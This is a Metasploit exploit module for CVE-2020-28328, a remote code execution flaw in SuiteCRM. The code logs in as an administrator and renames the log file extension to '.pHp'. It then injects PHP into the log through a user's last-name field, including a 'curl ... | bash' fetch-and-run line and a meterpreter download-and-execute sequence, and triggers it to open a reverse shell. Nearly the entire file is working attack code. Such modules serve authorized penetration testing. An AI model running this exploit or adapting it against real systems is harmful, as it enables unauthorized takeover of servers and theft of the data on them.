##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::CmdStager
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'SuiteCRM Log File Remote Code Execution',
'Description' => %q{
This module exploits an input validation error on the log file extension parameter. It does
not properly validate upper/lower case characters. Once this occurs, the application log file
will be treated as a php file. The log file can then be populated with php code by changing the
username of a valid user, as this info is logged. The php code in the file can then be executed
by sending an HTTP request to the log file. A similar issue was reported by the same researcher
where a blank file extension could be supplied and the extension could be provided in the file
name. This exploit will work on those versions as well, and those references are included.
},
'License' => MSF_LICENSE,
'Author' =>
[
'M. Cory Billington' # @_th3y
],
'References' =>
[
['CVE', '2020-28328'], # First CVE
['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
],
'Platform' => %w[linux unix],
'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
'Targets' =>
[
[
'Linux (x64)', {
'Arch' => ARCH_X64,
'Platform' => 'linux',
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
}
}
],
[
'Linux (cmd)', {
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
]
],
'Notes' =>
{
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
},
'Privileged' => true,
'DisclosureDate' => '2021-04-28',
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
OptString.new('PASS', [true, 'Password for administrator', 'admin']),
OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
]
)
end
def check
authenticate unless @authenticated
return Exploit::CheckCode::Unknown unless @authenticated
version_check_request = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'keep_cookies' => true,
'vars_get' => {
'module' => 'Home',
'action' => 'About'
}
}
)
return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request
version_match = version_check_request.body[/
Version
\s
\d{1} # Major revision
\.
\d{1,2} # Minor revision
\.
\d{1,2} # Bug fix release
/x]
version = version_match.partition(' ').last
if version.nil? || version.empty?
about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
end
patched_version = Rex::Version.new('7.11.18')
current_version = Rex::Version.new(version)
return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version
Exploit::CheckCode::Safe("SuiteCRM #{version}")
end
def authenticate
print_status("Authenticating as #{datastore['USER']}")
initial_req = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'index.php'),
'keep_cookies' => true,
'vars_get' => {
'module' => 'Users',
'action' => 'Login'
}
}
)
return false unless initial_req && initial_req.code == 200
login = send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'index.php'),
'keep_cookies' => true,
'vars_post' => {
'module' => 'Users',
'action' => 'Authenticate',
'return_module' => 'Users',
'return_action' => 'Login',
'user_name' => datastore['USER'],
'username_password' => datastore['PASS'],
'Login' => 'Log In'
}
}
)
return false unless login && login.code == 302
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'index.php'),
'keep_cookies' => true,
'vars_get' => {
'module' => 'Administration',
'action' => 'index'
}
}
)
auth_succeeded?(res)
end
def auth_succeeded?(res)
return false unless res
if res.code == 200
print_good("Authenticated as: #{datastore['USER']}")
if res.body.include?('Unauthorized access to administration.')
print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
@is_admin = false
else
print_good("#{datastore['USER']} has administrative rights.")
@is_admin = true
end
@authenticated = true
return true
else
print_error("Failed to authenticate as: #{datastore['USER']}")
return false
end
end
def post_log_file(data)
send_request_cgi(
{
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'index.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'keep_cookies' => true,
'headers' => {
'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
},
'data' => data.to_s
}
)
end
def modify_system_settings_file
filename = rand_text_alphanumeric(8).to_s
extension = '.pHp'
@php_fname = filename + extension
action = 'Modify system settings file'
print_status("Trying - #{action}")
data = Rex::MIME::Message.new
data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
data.add_part('Configurator', nil, nil, 'form-data; name="module"')
data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
data.add_part('info', nil, nil, 'form-data; name="logger_level"')
data.add_part('Save', nil, nil, 'form-data; name="save"')
res = post_log_file(data)
check_logfile_request(res, action)
end
def poison_log_file
action = 'Poison log file'
if target.arch.first == 'cmd'
command_injection = "<?php `curl #{@download_url} | bash`; ?>"
else
@meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
command_injection = %(
<?php `curl #{@download_url} -o #{@meterpreter_fname};
/bin/chmod 700 #{@meterpreter_fname};
/bin/sh -c #{@meterpreter_fname};`; ?>
)
end
print_status("Trying - #{action}")
data = Rex::MIME::Message.new
data.add_part('Users', nil, nil, 'form-data; name="module"')
data.add_part('1', nil, nil, 'form-data; name="record"')
data.add_part('Save', nil, nil, 'form-data; name="action"')
data.add_part('EditView', nil, nil, 'form-data; name="page"')
data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')
res = post_log_file(data)
check_logfile_request(res, action)
end
def restore
action = 'Restore logging to default configuration'
print_status("Trying - #{action}")
data = Rex::MIME::Message.new
data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
data.add_part('Configurator', nil, nil, 'form-data; name="module"')
data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
data.add_part('Save', nil, nil, 'form-data; name="save"')
post_log_file(data)
data = Rex::MIME::Message.new
data.add_part('Users', nil, nil, 'form-data; name="module"')
data.add_part('1', nil, nil, 'form-data; name="record"')
data.add_part('Save', nil, nil, 'form-data; name="action"')
data.add_part('EditView', nil, nil, 'form-data; name="page"')
data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')
res = post_log_file(data)
print_error("Failed - #{action}") unless res && res.code == 301
print_good("Succeeded - #{action}")
end
def check_logfile_request(res, action)
fail_with(Failure::Unknown, "#{action} - no reply") unless res
unless res.code == 301
print_error("Failed - #{action}")
fail_with(Failure::UnexpectedReply, "Failed - #{action}")
end
print_good("Succeeded - #{action}")
end
def execute_php
print_status("Executing php code in log file: #{@php_fname}")
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri, @php_fname),
'keep_cookies' => true
}
)
fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
register_files_for_cleanup(@php_fname)
register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
end
def on_request_uri(cli, _request)
send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
print_good("#{peer} - Payload sent!")
end
def start_http_server
start_service(
{
'Uri' => {
'Proc' => proc do |cli, req|
on_request_uri(cli, req)
end,
'Path' => resource_uri
}
}
)
@download_url = get_uri
end
def exploit
start_http_server
authenticate unless @authenticated
fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
modify_system_settings_file
poison_log_file
execute_php
ensure
restore if datastore['RESTORECONF']
end
end